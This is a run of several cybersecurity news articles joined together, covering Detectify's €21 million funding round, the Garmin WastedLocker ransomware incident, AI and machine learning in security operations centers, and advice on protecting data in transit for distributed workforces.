Detectify, the Sweden-born cybersecurity startup that offers a website vulnerability scanner powered by the crowd, has raised €21 million in further funding.
Leading the round is London-based VC firm Balderton Capital, with participation from existing investors Paua Ventures, Inventure and Insight Partners.
Detectify says the new funding will be used to continue to hire “world-class” talent to further accelerate the company’s growth and deliver on its mission to reduce internet security vulnerabilities.
Founded in late 2013 by a self-described group of “elite hackers” from Sweden, the company offers a website security tool that uses automation to scan websites for vulnerabilities to help customers (i.e. developers) stay on top of security. The more unique part of the service, however, is that it is in part maintained — or, rather, kept up to date — via the crowd in the form of Detectify’s “ethical hacker network.”
As we explained when the startup raised its €5 million Series A round, this sees top-ranked security researchers submit vulnerabilities that are then built into the Detectify scanner and used in customers’ security tests. The clever part is that researchers get paid every time their submitted module identifies a vulnerability on a customer’s website. In other words, incentives are kept aligned, giving Detectify a potential advantage and greater scale compared to similar website security automation tools.
Detectify co-founder and CEO Rickard Carlsson tells me the company has made a lot of progress in the past 12 months, including building out the crowdsourcing part of its proposition in order to grow the number of known vulnerabilities.
“Modules from crowdsourcing hackers have now generated 110,000 plus vulnerabilities in our customer base,” he says. “And the community is about 2.5 times as large now”.
In the last year, Detectify has also expanded its client base in the U.S, and says it now counts leading software companies such as Trello, Spotify and King as customers.
The young startup seems to be scoring well on the gender diversity front, too. It says that almost half (45%) of its 83 employees are female, including 50% at C-level. In addition, there are close to 30 nationalities across Detectify’s Stockholm and Boston offices.
Adds James Wise, partner at Balderton Capital, in a statement: “Detectify brings together the power of human ingenuity, the immense scalability of software, and a strong culture of transparency and integrity to provide world-class security to everyone. This is a fundamentally new approach to protecting businesses from new cyber security threats, and alongside our other cyber security investments, including Darktrace, Recorded Future & Tessian, we see Detectify as part of a new wave of solutions to make the web safer for everyone.”
[Records Exposed: N/A | Industry: Technology | Type Of Attack: Ransomware]
On July 23, Garmin users went to Twitter to express their concern over inaccessible website features. Four days later, Garmin released an official statement confirming that a cyber attack had taken place. Garmin assured its users that no PII (personal identifying information) was compromised.
Garmin is most commonly known for its fitness tracking capabilities in the form of GPS wearables, but the corporation also operates in the aviation space. Consequently, some planes whose aviation infrastructure relies on Garmin technology were also affected by the hack.
Hackers deployed the ransomware tool WastedLocker, which encrypts key data on a company’s digital infrastructure. In the case of Garmin, website functions, customer support, and user applications were all affected. Unlike typical ransomware software, WastedLocker does not steal identifying information and hold it for ransom. Instead, it renders programs useless until decrypted. The hacking organization then demands a fee for the decryption key. In the case of Garmin, although not verified by the U.S. corporation, it is believed that Garmin paid the $10 million ransom.
In the world of cyber crime, however, nothing is cut and dry. Cyber security experts have linked this young ransomware tool with the Russian hacking group known as Evil Corp. If this is the case, assuming the WastedLocker attack occurred under Evil Corp’s authority and not as a ransomware-for-hire event, Garmin had a difficult choice to make. To return their systems to working order, they had to risk breaking U.S. sanctions against Evil Corp.
Third-party negotiators can act as intermediaries between the hacked and the hackers. It appears that Garmin paid a cyber security firm in New Zealand to assist with the hack, meaning it is likely that they worked as the go-between to legally pay the $10 million ransom without breaking U.S. sanction laws. Garmin has declined to discuss the cyber event beyond its bare-bones press release on the 27th.
While ransomware attacks are nothing new, they are rapidly growing in sophistication and scale. It is believed that organized cyber crime entities are investing their “earnings” back into their hacking infrastructure much the way a startup grows by investing its profits. They’re building out specialized teams in order to run their operation on a larger scale, target larger entities, and decrease their rate of detection.
Traditionally, government organizations, cities, hospitals, and universities are most commonly targets of ransomware attacks. Those ransoms averaged around $100,000. Now, however, it appears threat actors like Evil Corp has moved their sites to Fortune 500 companies with random demands in the millions. Garmin may be just the beginning of a new ransomware era that specifically targets large U.S. corporations. That isn’t to say SMBs are off the hook. As Evil Corp and the likes go after bigger fish, the pond opens up for young hackers to come in and take their place.
To pay or not to pay a ransomware ransom comes down to personal choice. A Tripwire article by Graham Cluley offers this perspective: “That ultimately is a decision that only you can make. Bear in mind that the more companies that pay a ransom, the more the criminals are likely to launch similar attacks in the future. At the same time, you may feel that your business needs to make the difficult but pragmatic decision to pay the criminals if you feel your company cannot survive any other way.”
At its core, preventing ransomware attacks is about deploying a holistic cyber security solution. A hacking organization has nothing to ransom if it can’t breach enterprise systems. Most enterprise breaches start as basic phishing schemes. That is why organizations of all sizes must invest the time and money into strong cyber security policies and best practices such as:
Making it easy to report suspicious emails by embedding a “report phishing” button into all incoming emails which triggers a cyber security incident response
Giving employees the least amount of access they need to do their job, i.e. implementing a zero-trust strategy
Practicing and testing anti-phishing awareness internally or with the assistance of a cyber security third party vendor
Reducing workplace stress and creating a slower-paced environment, as cyber criminals pray on psychological human responses such as carelessness and hurriedness
The cybersecurity landscape is looking at higher than ever threat levels, data volumes quadrupling every 36 months, computing power and data transfer speeds increasing just as fast, and a diversity of IoT devices ushering in a new era of automation.
To get a grip on this, more organizations are exploring how AI can help. The Next-generation security operations center (SOC) incorporates automation and orchestration — automation applied to both defense operations and threat hunting incorporating AI and machine learning, and orchestration managing how multiple sets of tools and platforms work together.
“AI and ML are not only used in a next-generation SOC to enhance detection and prevention activities, but also, increasingly, to augment incident response actions such as containment actions, ticket creation, and user engagement to triage and/or validate a suspicious action,” stated John Harrison, Director, Cybersecurity Center of Excellence for Criterion, in an article he wrote for Nextgov. “The applications of AI and ML reduce the time spent on each alert and improve the Mean Time to Detect as well as the Mean Time to Repair.” Criterion is a systems integrator focused on solutions for government agencies.
New challenges facing SOCs include: serving the needs of remote and teleworking employees, a dramatically increased number during the pandemic; managing multiple cloud platforms; and dealing with an exploding number of IoT devices that need to be configured.
“The structure of SOCs is already adapting and evolving to bring together defensive operations and the analysis of emerging threats with the strategic introduction of new technologies. The result is a mature, flexible, risk-based and cost-efficient approach to ensure the crown jewels of an enterprise remain secure,” Harrison stated.
Historical ways of doing things are being updated. Security information and event management (SIEM), a term coined in 2005, provides a real-time analysis of security alerts generated by applications and network hardware. Firewalls, malware protection and other signature-based options solve part of the problem. Successful threat hunting requires a preemptive search of large data sets, using AI and machine learning. The idea is to identify threats that may or may already have evaded the current detection capabilities.
“The application of automation to threat hunting enables faster response time and more agile and improved recommendations on responses. It reduces attack vectors, breaches, and breach attempts and enables organizations to move from a purely reactive response to operating ahead of threats,” Harrison stated.
AI Seen As Potentially Helping Extend Budgets by Delivering More Value
The push to incorporate AI into cybersecurity is also being seen as a way to extend corporate security budgets under pressure.
AI in cybersecurity until 2014 was a marketing term, stated Raef Meeuwisse, CISM, CISA, author of “Cybersecurity for Business,” in a recent account in infosecurity. He is not a fan of machine learning on its own applied to cybersecurity. “The problem with machine learning is that the AI is limited to the features that it has been taught to expect,” he states. “Fooling a machine learning security system is as simple as adding an unexpected/ unprogrammed feature into the exploit.”
Artificial neural networks, in contrast, effectively self-organize how the system reviews and manages the data it has access to. “It does not need to have seen the behavior before, it only has to recognize the outcome, or potential outcome,” he states.
Security programs using AI technologies, often running as local agents, can now understand and block rogue identity and access activities, identify and quarantine malware, prevent data loss, adapt the security configurations of devices, with few or no errors. “The progression and investment into artificial neural network technology means that some security software technologies have now reached a level of competency that was unthinkable 10 years ago,” Meeuwisse states.
In some SIEM environments, the AI applied to security can inspect, alert and block based on analysis that would be impossible to achieve manually. “The AI technologies are literally performing the equivalent of years of manual security work every minute,” he states.
As the AI technologies become more stable, the author sees the price point moving lower as well. The average AI anti-malware solution for home use is now priced at less than $1 per device per month. “My own experience using these technologies is that they are incredibly helpful,” he stated.
AI is a New Learning Requirement for Cybersecurity Professionals
Cybersecurity professionals working in enterprises now face a requirement to learn about how AI and machine learning can work within their systems. “AI/ML has a direct effect on cybersecurity teams and brings a whole new set of needs to the enterprise,” stated Bob Peterson, CTO architect at Sungard Availability Services, an IT service management company, in a recent account in .
The creation and maintenance of the AI/ML security system requires a joint effort from many contributors. “The team requires domain experts that understand the security data and how it is generated, data analysis and data science experts that understand data analysis techniques, and AI/ML experts that translate this information into the right models and algorithms,” Peterson stated.
When hiring, it’s good to be open-minded. Maybe a candidate has a needed skill but needs to come up the learning curve in cybersecurity. “It may be easier to educate them on cybersecurity versus the technology skill itself,” Peterson stated.
Cybersecurity also faces a challenge in diversity of staff. Only 20% of security professionals are women and only 26% in the US are from marginalized communities, according to Sivan Nir, a threat intelligence team leader at Skybox Security, a cybersecurity software supplier.
“This is a big problem because cybersecurity, in particular, is a field that thrives on diversity,” Nir stated. “If you think about who we are up against, cybercriminals come from diverse backgrounds, so it is crucial our teams have different points of views and a variety of thought processes.”
Nir emphasized the importance of making people—especially girls and underrepresented groups—aware of tech and cybersecurity as a career path from a young age. “Working in technological fields should be seen as exciting, not intimidating,” she stated. “Cybersecurity, in particular, is never boring—it tackles real-world challenges at a fast pace every day.”
Before the current millennium, enterprise talent would go to the office. It was so straightforward. Talent would all just sit at enterprise stations on prem and exist within a knowingly defined perimeter. The Firewall, VPN, LAN, Antivirus environment was within the gaze- and right under the nose- of the CISO.
CISO prioritization has always been on securing that perimeter. Managing technology vulnerabilities to ensure visibility over the complete threat landscape was the day-in-day out activity. The castle and moat strategy worked well when everything was inside the castle. But as cloud migration began and remote work continued, the perimeter expanded. The best CISOs in the business evolved with these changes and increased focus on nimble privilege-based access as opposed to a simple VPN on/off switch. Data at rest was always in view. Data in transit had been tougher to track. With global enterprise moving to a distributed structure reality, visibility over data in transit is truly an issue.
With the user consistently accessing data via non-enterprise endpoints an updated mindset and approach come into focus. In our Interactive Discussion on the CSHub Mid Year Report, Dennis Leber noted, “data is the new perimeter.”
We’ve been using the phrase infinite perimeter on CSHub to showcase what must be managed- access, endpoint, cloud and now IoT- as ever expansive. The distributed workforce, plus your 3rd party partners, plus their 3rd party partners thrusts access management and the concepts of least privilege and zero trust to the fore. Those same distributed users bringing their own devices turns endpoint security into a game of cat and mouse. Your network now includes the home routers of your distributed workforce as well as their smart speakers.
The data breach can now occur via myriad means. And so, rather than focus on the perimeter point that has been breached, focus on the data.
Controls For The Data Breach
A breach has always been focused on the data. But with an easily defined perimeter, the focus of the information security officer was rightly on the breach. Gaining an ever-widening scope of focus on the exponential expanse of the perimeter is mandatory. An additional focus on data at rest and data in transit will assist in that infinite perimeter scope of focus achieving clarity.
The focus has been on knowing where the crown jewels sit and protecting that space. CSHub Executive Board Member and IEEE Public Visibility Initiative spokesperson Kayne McGladrey notes, “if you don’t know where your data live, you can’t apply any effective policies around access controls or do any meaningful incident response or do any meaningful security awareness.”
Focusing on the Data in the Data Breach
As data exfiltration abounds, getting a handle on data in transit is of course, key. McGladrey continues, “right now, for almost all businesses data is the most important thing they have, whether it’s PII, PHI, IP. The threat actors are not attacking because people have nice office spaces that are currently empty, and they’re not attacking because they have nice manufacturing capacity, that’s also operating at a lower rate. They’re attacking because they want to steal the data and do things with it, depending on their motivation. And if you can’t say empirically, ‘We know where all those data are,’ you can not apply controls.”
But having basic controls over data in transit is simply not good enough. McGladrey expounds, “Build both policies to require encryption of data in transit, as well as policies around approved services to use, and then implement telemetry. If you don’t have a policy that says, ‘We’re going to have a standards list of approved services for transmitting data across organizations, and we’re going to have enforcement of that in our technical control,’ – think like a CASB at the very simplest level- then ultimately you have no idea where your data are going at the end of the day.”
Knowing everything about that most-important data in transit leads you to a cogent understanding of your actual enterprise risk. Horizon Power CISO and CSHub Executive Board Member Jeff Campbell notes, “It’s all got to be based on risk. Tapping into the corporate risk framework at your organization and understanding what they consider to be important as a strategic enabler, and then understanding that security- particularly now in this digital future- plays a very, very important part in enabling those strategic initiatives.”
Prioritization and risk go hand-in-hand. If the wrong things are prioritized, your risk increases. McGladrey notes that’s all the more important in a distributed enterprise. “Some of the projects that get spun up aren’t really going to have a material reduction in risk- and they’re not going to have a significant benefit to the business and with a nomadic workforce- that becomes a challenge.”
The organization should of course be already running in line with an industry standard like Center for Internet Security’s critical security controls. That ensures that you know that the enterprise is secure with where the business is. Zeroing in on the larger long-term enterprise goals provides a context of where the business is going. Understanding the Board and C-Suite cyber security focus points denotes how you can connect cyber security to those business goals. And when that connection is made, so is the business case for your current and future budget.
Campbell sums up, “So how do you prioritize? You develop metrics consistent with what your board likes to see around cyber security, as well as how that ties in into delivery of those initiatives. Those metrics need to be framed in a way that is a common language, and the common language at the board and executive layer. And that’s how you prioritize.”
The theme of business enablement has rifled through the industry over the past few years and the focus now has a fever pitch. A focus on business enablement has been about ensuring that the CISO can simply do what they know they need to do. We have now turned the corner in that business enablement can now help a CISO understand how to prioritize what they need to do.